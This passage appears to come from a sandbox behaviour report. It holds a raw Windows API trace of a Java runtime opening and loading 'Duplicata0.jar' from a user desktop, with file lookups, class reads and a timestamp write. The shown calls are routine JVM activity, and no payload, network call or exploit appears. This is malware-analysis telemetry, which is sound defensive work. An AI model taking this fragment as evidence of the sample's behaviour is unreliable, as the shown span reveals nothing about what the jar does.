Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned 0x37 [0017.777] wcscpy (in: _Dest=0xb2aff0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar" [0017.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x38 [0017.777] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.778] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.778] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned 0x37 [0017.778] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.778] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.778] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.778] wcslen (_String="sunpkcs11.jar") returned 0xd [0017.779] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned 0x37 [0017.779] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned 0x37 [0017.779] wcscpy (in: _Dest=0xb2aff0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar" [0017.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x38 [0017.780] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.781] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.781] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned 0x33 [0017.781] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.781] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.781] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.781] wcslen (_String="zipfs.jar") returned 0x9 [0017.781] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned 0x33 [0017.782] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned 0x33 [0017.782] wcscpy (in: _Dest=0xb2afe8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar" [0017.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x34 [0017.782] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.783] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x1b [0017.783] wcscpy (in: _Dest=0xb2af78, _Source="C:\\Windows\\Sun\\Java\\lib\\ext" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext") returned="C:\\Windows\\Sun\\Java\\lib\\ext" [0017.783] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x1b [0017.783] wcscpy (in: _Dest=0xacee30, _Source="C:\\Windows\\Sun\\Java\\lib\\ext" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext") returned="C:\\Windows\\Sun\\Java\\lib\\ext" [0017.783] GetFileAttributesW (lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext") returned 0xffffffff [0017.793] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0017.797] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.797] _wfullpath (in: _Buffer=0xb30f50, _Path="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", _BufferCount=0x400 | out: _Buffer="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.797] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.797] wcsncmp (_String1="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0017.797] wcslen (_String="C:\\Users") returned 0x8 [0017.797] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24ee80 [0017.797] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.797] wcslen (_String="Users") returned 0x5 [0017.797] wcslen (_String="C:\\Users\\DSsDPMx042") returned 0x13 [0017.797] FindFirstFileW (in: lpFileName="C:\\Users\\DSsDPMx042", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24ee80 [0017.798] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.798] wcslen (_String="DSsDPMx042") returned 0xa [0017.798] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop") returned 0x1b [0017.798] FindFirstFileW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24ee80 [0017.798] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.798] wcslen (_String="Desktop") returned 0x7 [0017.798] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.798] FindFirstFileW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24ee80 [0017.798] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.798] wcslen (_String="Duplicata0.jar") returned 0xe [0017.798] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.799] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.799] wcscpy (in: _Dest=0xb30ed8, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.799] GetFullPathNameW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", nBufferLength=0x9, lpBuffer=0x4becb0, lpFilePart=0x4becac | out: lpBuffer="", lpFilePart=0x4becac) returned 0x2b [0017.799] GetFileAttributesExW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", fInfoLevelId=0x0, lpFileInformation=0x4beca0 | out: lpFileInformation=0x4beca0) returned 1 [0017.799] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.799] wcscpy (in: _Dest=0xb30ed8, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.799] GetFullPathNameW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", nBufferLength=0x9, lpBuffer=0x4becb0, lpFilePart=0x4becac | out: lpBuffer="", lpFilePart=0x4becac) returned 0x2b [0017.799] GetFileAttributesExW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", fInfoLevelId=0x0, lpFileInformation=0x4beca0 | out: lpFileInformation=0x4beca0) returned 1 [0017.800] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.800] wcscpy (in: _Dest=0xb30ed8, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.800] GetFullPathNameW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2b [0017.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0017.801] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0017.877] GetEnvironmentStringsW () returned 0x24f4f0 [0017.877] FreeEnvironmentStringsW (penv=0x24f4f0) returned 1 [0017.898] wcslen (_String="C:\\Program Files\\Java\\conf\\usagetracker.properties") returned 0x32 [0017.898] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\conf\\usagetracker.properties" | out: _Dest="C:\\Program Files\\Java\\conf\\usagetracker.properties") returned="C:\\Program Files\\Java\\conf\\usagetracker.properties" [0017.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\conf\\usagetracker.properties", nBufferLength=0x9, lpBuffer=0x4bed30, lpFilePart=0x4bed2c | out: lpBuffer="", lpFilePart=0x4bed2c) returned 0x33 [0017.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\conf\\usagetracker.properties", fInfoLevelId=0x0, lpFileInformation=0x4bed20 | out: lpFileInformation=0x4bed20) returned 0 [0017.898] GetLastError () returned 0x3 [0017.899] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties") returned 0x48 [0017.899] wcscpy (in: _Dest=0xacacc8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties" [0017.899] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties", nBufferLength=0x9, lpBuffer=0x4bed30, lpFilePart=0x4bed2c | out: lpBuffer="", lpFilePart=0x4bed2c) returned 0x49 [0017.899] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\management\\usagetracker.properties", fInfoLevelId=0x0, lpFileInformation=0x4bed20 | out: lpFileInformation=0x4bed20) returned 0 [0017.904] GetLastError () returned 0x2 [0017.904] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.904] _wfullpath (in: _Buffer=0xb682e8, _Path="C:\\Program Files\\Java\\jre1.8.0_92", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92") returned="C:\\Program Files\\Java\\jre1.8.0_92" [0017.904] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.904] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0017.904] wcslen (_String="C:\\Program Files") returned 0x10 [0017.904] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be6f0 | out: lpFindFileData=0x4be6f0) returned 0x24f4f0 [0017.905] FindClose (in: hFindFile=0x24f4f0 | out: hFindFile=0x24f4f0) returned 1 [0017.905] wcslen (_String="Program Files") returned 0xd [0017.905] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0017.905] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be6f0 | out: lpFindFileData=0x4be6f0) returned 0x24f4f0 [0017.905] FindClose (in: hFindFile=0x24f4f0 | out: hFindFile=0x24f4f0) returned 1 [0017.905] wcslen (_String="Java") returned 0x4 [0017.905] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.905] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be6f0 | out: lpFindFileData=0x4be6f0) returned 0x24f4f0 [0017.905] FindClose (in: hFindFile=0x24f4f0 | out: hFindFile=0x24f4f0) returned 1 [0017.905] wcslen (_String="jre1.8.0_92") returned 0xb [0017.905] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.906] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.906] wcscpy (in: _Dest=0xb4d708, _Source="C:\\Program Files\\Java\\jre1.8.0_92" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92") returned="C:\\Program Files\\Java\\jre1.8.0_92" [0017.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", nBufferLength=0x9, lpBuffer=0x4bf120, lpFilePart=0x4bf11c | out: lpBuffer="", lpFilePart=0x4bf11c) returned 0x22 [0017.906] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", fInfoLevelId=0x0, lpFileInformation=0x4bf110 | out: lpFileInformation=0x4bf110) returned 1 [0017.906] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.906] wcscpy (in: _Dest=0xb4d708, _Source="C:\\Program Files\\Java\\jre1.8.0_92" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92") returned="C:\\Program Files\\Java\\jre1.8.0_92" [0017.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", nBufferLength=0x9, lpBuffer=0x4bf120, lpFilePart=0x4bf11c | out: lpBuffer="", lpFilePart=0x4bf11c) returned 0x22 [0017.906] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", fInfoLevelId=0x0, lpFileInformation=0x4bf110 | out: lpFileInformation=0x4bf110) returned 1 [0017.908] wcslen (_String="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp") returned 0x3f [0017.908] wcscpy (in: _Dest=0xaab7e0, _Source="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp" | out: _Dest="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp") returned="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp" [0017.908] GetFullPathNameW (in: lpFileName="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp", nBufferLength=0x9, lpBuffer=0x4bf190, lpFilePart=0x4bf18c | out: lpBuffer="", lpFilePart=0x4bf18c) returned 0x40 [0017.908] GetFileAttributesExW (in: lpFileName="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp", fInfoLevelId=0x0, lpFileInformation=0x4bf180 | out: lpFileInformation=0x4bf180) returned 1 [0017.909] wcslen (_String="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp") returned 0x3f [0017.909] wcscpy (in: _Dest=0xaab7e0, _Source="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp" | out: _Dest="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp") returned="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp" [0017.909] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp" (normalized: "c:\\users\\dssdpmx042\\.oracle_jre_usage\\90737d32e3abaa4.timestamp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0017.914] strlen (_Str="sun/nio/cs/UTF_8") returned 0x10 [0017.918] WriteFile (in: hFile=0x1ac, lpBuffer=0x4bd180*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x4bd130, lpOverlapped=0x0 | out: lpBuffer=0x4bd180*, lpNumberOfBytesWritten=0x4bd130, lpOverlapped=0x0) returned 1 [0017.920] CloseHandle (hObject=0x1ac) returned 1 [0017.939] strlen (_Str="sun/nio/cs/ISO_8859_1") returned 0x15 [0017.940] strlen (_Str="sun/nio/cs/UTF_16BE") returned 0x13 [0017.942] strlen (_Str="sun/nio/cs/UTF_16LE") returned 0x13 [0017.943] strlen (_Str="sun/nio/cs/UTF_16") returned 0x11 [0017.960] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.960] wcscpy (in: _Dest=0xb68e60, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.960] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" (normalized: "c:\\users\\dssdpmx042\\desktop\\duplicata0.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x1c4 [0017.960] GetFileTime (in: hFile=0x1c4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4bf700 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4bf700*(dwLowDateTime=0x6a1d3200, dwHighDateTime=0x1d20216)) returned 1 [0017.960] CloseHandle (hObject=0x1c4) returned 1 [0017.961] _errno () returned 0xc1e118 [0017.961] strlen (_Str="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.961] strcpy (in: _Dest=0x4bf2f4, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.961] strcmp (_Str1="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 1 [0017.961] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.961] wcscpy (in: _Dest=0xb68e60, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0017.961] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" (normalized: "c:\\users\\dssdpmx042\\desktop\\duplicata0.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0017.961] calloc (_Count=0x1, _Size=0x78) returned 0xaab958 [0017.961] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bf5e8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x4bf59c, lpOverlapped=0x0 | out: lpBuffer=0x4bf5e8*, lpNumberOfBytesRead=0x4bf59c*=0x4, lpOverlapped=0x0) returned 1 [0017.962] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bf5cc | out: lpNewFilePointer=0x0) returned 1 [0017.963] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6d5b, lpNewFilePointer=0x0, dwMoveMethod=0x4bf474 | out: lpNewFilePointer=0x0) returned 1 [0017.963] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bf4f4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x4bf444, lpOverlapped=0x0 | out: lpBuffer=0x4bf4f4*, lpNumberOfBytesRead=0x4bf444*=0x80, lpOverlapped=0x0) returned 1 [0017.963] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4bf474 | out: lpNewFilePointer=0x0) returned 1 [0017.963] ReadFile (in: hFile=0x1c4, lpBuffer=0xb69c60, nNumberOfBytesToRead=0x4a4, lpNumberOfBytesRead=0x4bf444, lpOverlapped=0x0 | out: lpBuffer=0xb69c60*, lpNumberOfBytesRead=0x4bf444*=0x4a4, lpOverlapped=0x0) returned 1 [0017.963] calloc (_Count=0xe, _Size=0x10) returned 0xb5f5a0 [0017.963] calloc (_Count=0x2, _Size=0x4) returned 0xaa87a0 [0017.979] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4bf1f8 | out: lpNewFilePointer=0x0) returned 1 [0017.979] ReadFile (in: hFile=0x1c4, lpBuffer=0xacae18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bf1c8, lpOverlapped=0x0 | out: lpBuffer=0xacae18*, lpNumberOfBytesRead=0x4bf1c8*=0xa0, lpOverlapped=0x0) returned 1 [0018.000] calloc (_Count=0x1, _Size=0x38) returned 0xb36ef0 [0018.005] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bd4bc | out: lpNewFilePointer=0x0) returned 1 [0018.005] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bd4f4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd48c, lpOverlapped=0x0 | out: lpBuffer=0x4bd4f4*, lpNumberOfBytesRead=0x4bd48c*=0x1e, lpOverlapped=0x0) returned 1 [0018.005] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x36, lpNewFilePointer=0x0, dwMoveMethod=0x4bd4f8 | out: lpNewFilePointer=0x0) returned 1 [0018.005] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bd574, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x4bd4c8, lpOverlapped=0x0 | out: lpBuffer=0x4bd574*, lpNumberOfBytesRead=0x4bd4c8*=0x7b, lpOverlapped=0x0) returned 1 [0018.024] CloseHandle (hObject=0x1c4) returned 1 [0018.026] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader") returned 0x35 [0018.033] strlen (_Str="sun/nio/cs/ThreadLocalCoders.class") returned 0x22 [0018.033] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338daf2, lpNewFilePointer=0x0, dwMoveMethod=0x4be280 | out: lpNewFilePointer=0x0) returned 1 [0018.033] ReadFile (in: hFile=0xd4, lpBuffer=0xacae18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be250, lpOverlapped=0x0 | out: lpBuffer=0xacae18*, lpNumberOfBytesRead=0x4be250*=0xa0, lpOverlapped=0x0) returned 1 [0018.033] strlen (_Str="sun/nio/cs/ThreadLocalCoders.class") returned 0x22 [0018.034] strcpy (in: _Dest=0x4be384, _Source="sun/nio/cs/ThreadLocalCoders.class" | out: _Dest="sun/nio/cs/ThreadLocalCoders.class") returned="sun/nio/cs/ThreadLocalCoders.class" [0018.034] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c13e3, lpNewFilePointer=0x0, dwMoveMethod=0x4bde84 | out: lpNewFilePointer=0x0) returned 1 [0018.034] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdebc, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bde54, lpOverlapped=0x0 | out: lpBuffer=0x4bdebc*, lpNumberOfBytesRead=0x4bde54*=0x1e, lpOverlapped=0x0) returned 1 [0018.035] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c1423, lpNewFilePointer=0x0, dwMoveMethod=0x4bdec0 | out: lpNewFilePointer=0x0) returned 1 [0018.035] ReadFile (in: hFile=0xd4, lpBuffer=0xb3f958, nNumberOfBytesToRead=0x3f8, lpNumberOfBytesRead=0x4bde90, lpOverlapped=0x0 | out: lpBuffer=0xb3f958*, lpNumberOfBytesRead=0x4bde90*=0x3f8, lpOverlapped=0x0) returned 1 [0018.037] strlen (_Str="sun/nio/cs/ThreadLocalCoders$1.class") returned 0x24 [0018.037] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338d9f8, lpNewFilePointer=0x0, dwMoveMethod=0x4bdffc | out: lpNewFilePointer=0x0) returned 1 [0018.037] ReadFile (in: hFile=0xd4, lpBuffer=0xacae18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bdfcc, lpOverlapped=0x0 | out: lpBuffer=0xacae18*, lpNumberOfBytesRead=0x4bdfcc*=0xa0, lpOverlapped=0x0) returned 1 [0018.037] strlen (_Str="sun/nio/cs/ThreadLocalCoders$1.class") returned 0x24 [0018.037] strcpy (in: _Dest=0x4be100, _Source="sun/nio/cs/ThreadLocalCoders$1.class" | out: _Dest="sun/nio/cs/ThreadLocalCoders$1.class") returned="sun/nio/cs/ThreadLocalCoders$1.class" [0018.037] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c0668, lpNewFilePointer=0x0, dwMoveMethod=0x4bdc00 | out: lpNewFilePointer=0x0) returned 1 [0018.037] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdc38, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdbd0, lpOverlapped=0x0 | out: lpBuffer=0x4bdc38*, lpNumberOfBytesRead=0x4bdbd0*=0x1e, lpOverlapped=0x0) returned 1 [0018.038] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c06aa, lpNewFilePointer=0x0, dwMoveMethod=0x4bdc3c | out: lpNewFilePointer=0x0) returned 1 [0018.038] ReadFile (in: hFile=0xd4, lpBuffer=0xb3f958, nNumberOfBytesToRead=0x46c, lpNumberOfBytesRead=0x4bdc0c, lpOverlapped=0x0 | out: lpBuffer=0xb3f958*, lpNumberOfBytesRead=0x4bdc0c*=0x46c, lpOverlapped=0x0) returned 1 [0018.039] strlen (_Str="sun/nio/cs/ThreadLocalCoders$Cache.class") returned 0x28 [0018.039] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338da9c, lpNewFilePointer=0x0, dwMoveMethod=0x4bd99c | out: lpNewFilePointer=0x0) returned 1 [0018.039] ReadFile (in: hFile=0xd4, lpBuffer=0xacae18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bd96c, lpOverlapped=0x0 | out: lpBuffer=0xacae18*, lpNumberOfBytesRead=0x4bd96c*=0xa0, lpOverlapped=0x0) returned 1 [0018.039] strlen (_Str="sun/nio/cs/ThreadLocalCoders$Cache.class") returned 0x28 [0018.039] strcpy (in: _Dest=0x4bdaa0, _Source="sun/nio/cs/ThreadLocalCoders$Cache.class" | out: _Dest="sun/nio/cs/ThreadLocalCoders$Cache.class") returned="sun/nio/cs/ThreadLocalCoders$Cache.class" [0018.039] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c0fc4, lpNewFilePointer=0x0, dwMoveMethod=0x4bd5a0 | out: lpNewFilePointer=0x0) returned 1 [0018.039] ReadFile (in: hFile=0xd4, lpBuffer=0x4bd5d8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd570, lpOverlapped=0x0 | out: lpBuffer=0x4bd5d8*, lpNumberOfBytesRead=0x4bd570*=0x1e, lpOverlapped=0x0) returned 1 [0018.039] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c100a, lpNewFilePointer=0x0, dwMoveMethod=0x4bd5dc | out: lpNewFilePointer=0x0) returned 1 [0018.039] ReadFile (in: hFile=0xd4, lpBuffer=0xb3ff60, nNumberOfBytesToRead=0x3d9, lpNumberOfBytesRead=0x4bd5ac, lpOverlapped=0x0 | out: lpBuffer=0xb3ff60*, 